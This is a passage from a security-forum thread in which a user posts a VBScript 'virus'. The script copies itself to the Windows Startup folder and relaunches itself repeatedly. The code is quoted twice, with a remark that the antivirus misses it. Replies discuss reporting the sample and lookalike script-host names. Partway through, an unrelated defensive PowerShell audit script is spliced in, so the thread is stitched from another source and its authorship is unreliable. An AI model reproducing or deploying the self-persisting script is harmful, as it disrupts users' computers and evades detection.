Author Topic: Interesting virus  (Read 1702 times)


Offline lichesssatrancturkiye

  • Jr. Member
  • **
  • Posts: 30
Interesting virus
« on: November 22, 2021, 11:47:49 PM »
File name: file.vbs
Code:
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file.vbs")
Set objShell = Nothing
When this program runs, the mouse cursor is always busy and the PC becomes laggy, and this program still runs after a restart.
It's easy to delete this virus (you can't delete the file; you should edit the file like this):
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("chrome")
Set objShell = Nothing
But it's very interesting that Avast can't detect it.
Notice: I tried to close this virus with Task Manager but it doesn't work, and when this virus runs the computer uses 100% CPU (because the antivirus scans files again and again but can't detect anything; also the virus program runs itself every time).
« Last Edit: November 24, 2021, 02:37:06 PM by r@vast »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89053
  • No support PMs thanks
Re: Interesting virus
« Reply #1 on: November 23, 2021, 01:56:20 AM »
I suggest that you modify your post rather than post the code, post an image or wrap the code in code tags (as I have below).

Code:
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file.vbs")
Set objShell = Nothing
when this program runs mouse cursor always runs and pc becomes laggy and this programs still runs after restart
it's easy to delete this virus (you can't delete file you should edit file like this
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("chrome")
Set objShell = Nothing

But my preference would always be to use an image.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Interesting virus
« Reply #2 on: November 23, 2021, 08:56:56 AM »
You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: Interesting virus
« Reply #3 on: November 23, 2021, 10:59:12 PM »
Do as DavidR suggests, we do not want malcreants to abuse this in some way or other. >:(

It is a legit Windows script, and as potentially malicious Avast should detect this as Win32:Vitro.

Typically, the wscript.exe executable can be located in "C:\Windows\System32", a Windows folder that contains operating system files.
However, if the wscript.exe filename is used to disguise malware, this particular file is placed in another folder and/or will have a different name (for example, wcript.exe).

Typically, cyber criminals give names very similar to legitimate files to avoid suspicion.
Moreover, when a malicious process is running in Task Manager, it should contain a graphic icon beside it, when actually it should have a system icon.

One should note that virus detection engines sometimes detect legitimate files as threats
(this could provide so-called 'false positive' results - FP's).

Submittal to avast as Asyn suggests in his posting may prevent this in the future for the "unaware".

All the more reason to be very suspicious with such Wscript shell virus examples.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
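As an added example (not code from this thread or from Avast), the following PowerShell audit covers both points raised above: the original script copies itself into the user's Startup folder (Shell.Application Namespace(7) resolves to that folder) so it is relaunched at every logon, and polonus notes that a genuine script host runs from System32 under its real name. Assumed: Windows PowerShell 5.1 or later; the trusted directories, script extensions and the crude "cript.exe" name net are my own choices.

```powershell
# Added example, not from the thread. Audits Startup-folder scripts and running script hosts.
# Assumption: Windows PowerShell 5.1+; Startup paths come from the current user's profile.

$startupFolders = @(
    [Environment]::GetFolderPath('Startup'),        # per-user Startup (what Namespace(7) maps to)
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup
) | Where-Object { $_ -and (Test-Path $_) }
$scriptExt = '.vbs', '.vbe', '.js', '.jse', '.wsf', '.wsh'

'== Script files in Startup folders =='
foreach ($folder in $startupFolders) {
    Get-ChildItem -Path $folder -File -Force |
        Where-Object { $scriptExt -contains $_.Extension.ToLower() } |
        ForEach-Object {
            [PSCustomObject]@{
                Path   = $_.FullName
                Bytes  = $_.Length
                SHA256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        } | Format-Table -AutoSize
}

'== Windows Script Host processes (including lookalike names) =='
$trustedDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")
# 'cript\.exe$' is a deliberately loose net so that typo-squats such as wcript.exe are listed too.
$wsh = Get-CimInstance Win32_Process | Where-Object { $_.Name -match 'cript\.exe$' }
$wsh | ForEach-Object {
    $dir = if ($_.ExecutablePath) { Split-Path -Parent $_.ExecutablePath } else { '<unknown>' }
    $flags = @()
    if ($_.Name -notmatch '^(wscript|cscript)\.exe$') { $flags += 'lookalike-name' }
    if ($trustedDirs -notcontains $dir)               { $flags += 'image-not-in-system-dir' }
    foreach ($s in $startupFolders) {
        # The script being run lives in a Startup folder: the persistence pattern from the post.
        if ($_.CommandLine -and $_.CommandLine.IndexOf($s, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
            $flags += 'script-in-startup-folder'; break
        }
    }
    [PSCustomObject]@{
        PID         = $_.ProcessId
        Name        = $_.Name
        ImageDir    = $dir
        CommandLine = $_.CommandLine
        Flags       = ($flags -join ',')
    }
} | Format-Table -AutoSize
# A script that relaunches itself shows up as a steadily growing number of script-host processes.
"Script-host process count: $(@($wsh).Count)"
```

Startup-folder entries and script-host processes are normal on many machines, so the flags are leads to inspect (and submit, as Asyn suggests), not verdicts.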

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: Interesting virus
« Reply #5 on: November 26, 2021, 06:36:20 PM »
Quote
The children of a WmiPrvSE process can often be the clue that helps identify suspicious behavior. If a wsmprovhost.exe process is identified on a system, it indicates PowerShell remoting activity. This process is executed on the remote, or target system.

source: SANS.org - could be part of WMI attacks.

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!